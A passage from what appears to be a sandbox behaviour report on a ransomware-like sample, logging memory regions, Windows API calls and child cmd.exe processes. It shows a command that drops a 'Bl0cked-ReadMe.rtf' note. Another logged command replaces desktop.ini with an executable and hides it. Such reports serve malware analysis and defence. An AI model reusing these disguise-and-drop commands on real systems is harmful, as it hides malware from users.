24609 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 24610 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 24611 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 24612 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 24613 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 24614 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 24615 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 24626 start_va = 0x550000 end_va = 0x60ffff entry_point = 0x550000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 433 os_tid = 0xac4 [0177.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afcf4 | out: lpSystemTimeAsFileTime=0x2afcf4*(dwLowDateTime=0x9f8986e0, dwHighDateTime=0x1d440a9)) [0177.530] GetCurrentProcessId () returned 0xcc0 [0177.530] GetCurrentThreadId () returned 0xac4 [0177.530] GetTickCount () returned 0x336c8 [0177.530] QueryPerformanceCounter (in: lpPerformanceCount=0x2afcec | out: lpPerformanceCount=0x2afcec*=23431951663) returned 1 [0177.531] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0177.531] __set_app_type (_Type=0x1) [0177.531] __p__fmode () returned 0x76b331f4 [0177.531] __p__commode () returned 0x76b331fc [0177.531] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0177.531] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0177.531] GetCurrentThreadId () returned 0xac4 [0177.531] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac4) returned 0x38 [0177.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0177.531] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0177.531] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0177.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afc84 | out: phkResult=0x2afc84*=0x0) returned 0x2 [0177.532] VirtualQuery (in: lpAddress=0x2afcbb, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.532] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0177.532] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0177.532] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.532] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afc54, dwLength=0x1c | out: lpBuffer=0x2afc54*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.532] GetConsoleOutputCP () returned 0x1b5 [0177.532] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.532] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0177.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.532] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0177.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.532] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.533] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.533] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0177.533] GetEnvironmentStringsW () returned 0x3501a8* [0177.533] FreeEnvironmentStringsW (penv=0x3501a8) returned 1 [0177.533] GetEnvironmentStringsW () returned 0x3501a8* [0177.533] FreeEnvironmentStringsW (penv=0x3501a8) returned 1 [0177.533] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebf4 | out: phkResult=0x2aebf4*=0x40) returned 0x0 [0177.533] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0xd0, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.533] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.533] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.533] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x0, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.534] RegCloseKey (hKey=0x40) returned 0x0 [0177.534] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aebf4 | out: phkResult=0x2aebf4*=0x40) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x40, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x1, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x0, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x4, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x4) returned 0x0 [0177.534] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aebfc, lpData=0x2aec00, lpcbData=0x2aebf8*=0x1000 | out: lpType=0x2aebfc*=0x0, lpData=0x2aec00*=0x9, lpcbData=0x2aebf8*=0x1000) returned 0x2 [0177.534] RegCloseKey (hKey=0x40) returned 0x0 [0177.534] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638d [0177.534] srand (_Seed=0x5b88638d) [0177.534] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"" [0177.534] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"" [0177.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.534] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0177.535] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.535] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.535] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.535] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0177.535] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0177.535] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0177.535] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0177.535] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0177.535] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0177.535] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0177.535] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0177.535] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0177.535] GetEnvironmentStringsW () returned 0x3522f8* [0177.535] FreeEnvironmentStringsW (penv=0x3522f8) returned 1 [0177.535] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.535] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.535] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0177.535] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0177.535] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0177.535] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0177.535] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0177.535] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0177.535] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0177.535] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0177.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af9c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.535] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af9c0, lpFilePart=0x2af9bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af9bc*="Desktop") returned 0x18 [0177.536] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0177.536] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x350038 [0177.536] FindClose (in: hFindFile=0x350038 | out: hFindFile=0x350038) returned 1 [0177.536] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x350038 [0177.536] FindClose (in: hFindFile=0x350038 | out: hFindFile=0x350038) returned 1 [0177.536] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af73c | out: lpFindFileData=0x2af73c) returned 0x350038 [0177.536] FindClose (in: hFindFile=0x350038 | out: hFindFile=0x350038) returned 1 [0177.536] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0177.536] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0177.536] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0177.536] GetEnvironmentStringsW () returned 0x352b18* [0177.537] FreeEnvironmentStringsW (penv=0x352b18) returned 1 [0177.537] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0177.537] GetConsoleOutputCP () returned 0x1b5 [0177.537] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.537] GetUserDefaultLCID () returned 0x409 [0177.537] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0177.537] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afb00, cchData=128 | out: lpLCData="0") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afb00, cchData=128 | out: lpLCData="0") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afb00, cchData=128 | out: lpLCData="1") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0177.538] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0177.538] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0177.539] GetConsoleTitleW (in: lpConsoleTitle=0x3408f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.539] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0177.539] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0177.539] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0177.539] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0177.540] _wcsicmp (_String1="type", _String2=")") returned 75 [0177.540] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0177.540] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0177.540] _wcsicmp (_String1="IF", _String2="type") returned -11 [0177.540] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0177.540] _wcsicmp (_String1="REM", _String2="type") returned -2 [0177.540] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0177.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.543] GetFileType (hFile=0x7) returned 0x2 [0177.544] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.544] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af9f8 | out: lpMode=0x2af9f8) returned 1 [0177.544] _dup (_FileHandle=1) returned 3 [0177.544] _close (_FileHandle=1) returned 0 [0177.544] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0177.544] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\defaul~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af9c8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.688] GetLastError () returned 0x20 [0177.688] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0177.688] _close (_FileHandle=3) returned 0 [0177.688] _get_osfhandle (_FileHandle=2) returned 0xb [0177.688] GetFileType (hFile=0xb) returned 0x2 [0177.688] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0177.688] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2af974 | out: lpMode=0x2af974) returned 1 [0177.689] _get_osfhandle (_FileHandle=2) returned 0xb [0177.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2af9a8 | out: lpConsoleScreenBufferInfo=0x2af9a8) returned 1 [0177.689] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The process cannot access the file because it is being used by another process.\r\n") returned 0x51 [0177.690] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2af9e8 | out: lpBuffer="The process cannot access the file because it is being used by another process.\r\n") returned 0x51 [0177.690] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x51, lpNumberOfCharsWritten=0x2af9cc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af9cc*=0x51) returned 1 [0177.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.690] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.690] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.690] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.690] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.691] SetConsoleInputExeNameW () returned 0x1 [0177.691] GetConsoleOutputCP () returned 0x1b5 [0177.691] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.691] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.691] exit (_Code=1) Process: id = "321" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xb9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24632 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24633 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24634 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24635 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 24636 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24637 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24638 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24639 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24640 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24641 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24662 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24663 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24664 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24665 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 24666 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 24667 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24668 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24669 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24670 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24671 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24672 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24673 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24674 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24675 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24676 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 24677 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = 